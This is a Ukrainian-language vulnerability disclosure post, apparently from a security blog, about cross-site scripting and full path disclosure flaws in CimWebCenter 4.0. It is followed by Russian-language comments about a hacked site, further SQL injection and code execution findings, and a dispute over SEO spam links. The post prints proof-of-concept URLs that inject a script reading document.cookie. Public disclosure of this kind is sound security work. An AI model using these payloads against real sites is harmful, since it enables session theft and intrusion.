Уразливості в CimWebCenter

23:54 06.11.2008

Ще 26.06.2006 я знайшов Cross-Site Scripting та Full path disclosure уразливості в системі CimWebCenter. Дірки виявив на офіційному сайті системи http://cimwebcenter.com, а також перевірив їх ще на двох сайтах на даній CMS (де і виявив Full path disclosure).

XSS:

http://site/forum/?mid=28&do=show_mess&tid=26%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&mode=-1
http://site/forum/?mid=28&do=show_mess&tid=26&mode=-1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Full path disclosure:

http://site/forum/?mid=28&do=show_mess&tid=26&mode=/

http://site/forum/?mid=28&do=/&tid=26&mode=-1

http://site/forum/?mid=/&do=show_mess&tid=26&mode=-1

Уразливі CimWebCenter 4.0 та попередні версії.

Про уразливості я одразу ж повідомив розробникам, які не відповіли і повністю проігнорували моє повідомлення. Це було ще до відкриття мого сайту і тому про цей випадок я не написав в новинах (але я собі відмітив, щоб про ці уразливості згадати, і сьогодні нарешті я знайшов час для цього).

Даний випадок був одним з багатьох в період з 2005 по середину 2006, коли власники сайтів і веб девелопери переважно ігнорували мої повідомлення про уразливості. Що й спонукало мене зробити свій веб проект (в літку 2006), в якому публічно оприлюднювати інформацію про уразливості на сайтах і в веб додатках, щоб стимулювати адмінів й девелоперів виправляти дірки. Дану діяльність я тоді й назвав соціальним секюріти аудитом.


5 відповідей на “Уразливості в CimWebCenter”

  1. InWeb каже:

    Сегодня был звонок от одного клиента данной веб-студии:
    - “Здравствуйте! Почему когда заходишь на наш сайт - перебрасывает на Ваш?”
    Проверил код их страницы - там какие то шутники вставили ява-скрипт -редирект на наш сайт. Это произошло - 2009 году! Проверил работу ЦМС-ки - там кроме вышеперечисленных баг есть еще серьезная (в плане представляемых возможностей) и весьма тупая (от разработчиков) SQL-injection :lol:

  2. InWeb каже:

    Уважаемый!
    Имейте совесть!
    Или запостите мою ссылку или улите весь предыдущий пост! Я не нанимался Вам на шару контент писать! Первый раз такое встречаю. Пишу по теме так еще и ссылку удаляют

  3. InWeb каже:

    Упс… прошу прощения. а следующие посты идут с сылкой и без модерации? ТОгда виноват. Беру все свои слова назад. яж не знал… :)

  4. MustLive каже:

    Проверил код их страницы - там какие то шутники вставили ява-скрипт -редирект на наш сайт.

    InWeb

    На взломанных сайтах редиректоры на чужой сайт обычно не встравляют и ты должен это понимать :-) . Обычно тот кто взламывает сайт вставляет редиректор на свой сайт. А в данном случае редиректор с сайта одной вебдев фирмы пересылает на сайт другой (конкурирующей) фирмы - это всё весьма подозрительно. В любом случае взломщики сайта cimwebcenter.com явно были неравнодушны к твоей веб студии ;-) .

    Когда я зашёл на этот сайт, то редиректора уже не было, поэтому не могу потдвердить данный инцидент.

    Проверил работу ЦМС-ки - там кроме вышеперечисленных баг есть еще серьезная (в плане представляемых возможностей) и весьма тупая (от разработчиков) SQL-injection

    Уязвимостей в их движке хватает, как тупых, так и не очень тупых. О наличии SQL Injection в движке мне известно (причём нескольких).

    07.11.2008, после написания данного поста, я исследовал несколько сайтов на данном движке, и нашёл, помимо вышеперечисленных Cross-Site Scripting и Full path disclosure дыр, также ещё три SQL Injection, SQL DB Structure Extraction, XSS и три Code Execution (позволяющие исполнять PHP код). CE потенциальные, т.к. вслепую их дожать (тогда) не удалось. Если я их дожму вслепую, или если мне исходник системы попадётся, то данные CE дырки будут представлять ещё большую опасность, чем имеющиеся SQLi (т.к. это уже будут уязвимости критического риска). И со временем я опубликую у себя на сайте эти уязвимости в CimWebCenter.

  5. MustLive каже:

    яж не знал…

    InWeb, у меня на сайте используется WordPress - достаточно распространённый движок, и с его особенностями работы ты вполне мог ранее сталкиваться. Но в любом случае, незнание не освобождает от необходимости прилично себя вести ;-) . В том числе не заниматься SEO-спамом.

    У меня на сайте премодерируется только первый комментарий, а последующие постятся без модерации - так я настроил (в любом случае я слежу за всеми коментами). При этом WP позволяет гибко включать премодерацию и для уже разрешённых комментаторов, поэтому увлекаться SEO-спамом ни у кого не получится.

    Имейте совесть!

    Дорогой мой, за мою совесть не переживай, она у меня есть и работает весьма эффективно. Как я уже тебе сказал, SEO-спамом не нужно увлекаться - он запрещён у меня на сайте, как и любой другой спам. А т.к. твой пост был сео-спамом, запощенным ради ссылки (что было очевидно, и что ты и сам в следующем коменте подтвердил), поэтому я и удалил твою ссылку. Я не раздаю просто так тИЦ, а PR не раздаётся на уровне двикжа (через nofollow).

    Или запостите мою ссылку или улите весь предыдущий пост!

    Не имей дурной привычки указывать владельцам сайтов, что им делать. Мне виднее, что делать с коментами, особенно сео-спамом.

    Чтобы иметь возможность постить у меня в коментах ссылки, нужно себя хорошо зарекомендовать. И в дальнейшем спокойно постить коменты с ссылками без премодерации. А ты же решил сразу сео-спамом заняться, что и привело к удалению ссылки. А после того, как ты начал несерьёзные притензии высказывать, да ещё и прямо признался, что ради ссылки запостил, у тебя будет мало шансов себя зарекомендовать.

    Я не нанимался Вам на шару контент писать!

    Во-первых, основной контент у меня - это посты на сайте, а коменты - это вторичный контент, и будут ли они, или нет, за это я не переживаю. Во-вторых, коменты у меня люди пишут не для получения обратных ссылок (т.е. сео-спам), а по собственному желанию.

    Поэтому бери пример с других посетителей сайта (которые постят без ссылок), и не занимайся сео-спамом. Весь спам, включая сео-спам, я удаляю (как на данном, так и на всех моих сайтах), за исключением тематического спама, который я оставляю без ссылок.

    Кому нужны беклинки, тот пусть не спамит, а занимается обменом ссылками, покупкой ссылок или использует мой SEO метод.

Leave a Reply

You must be logged in to post a comment.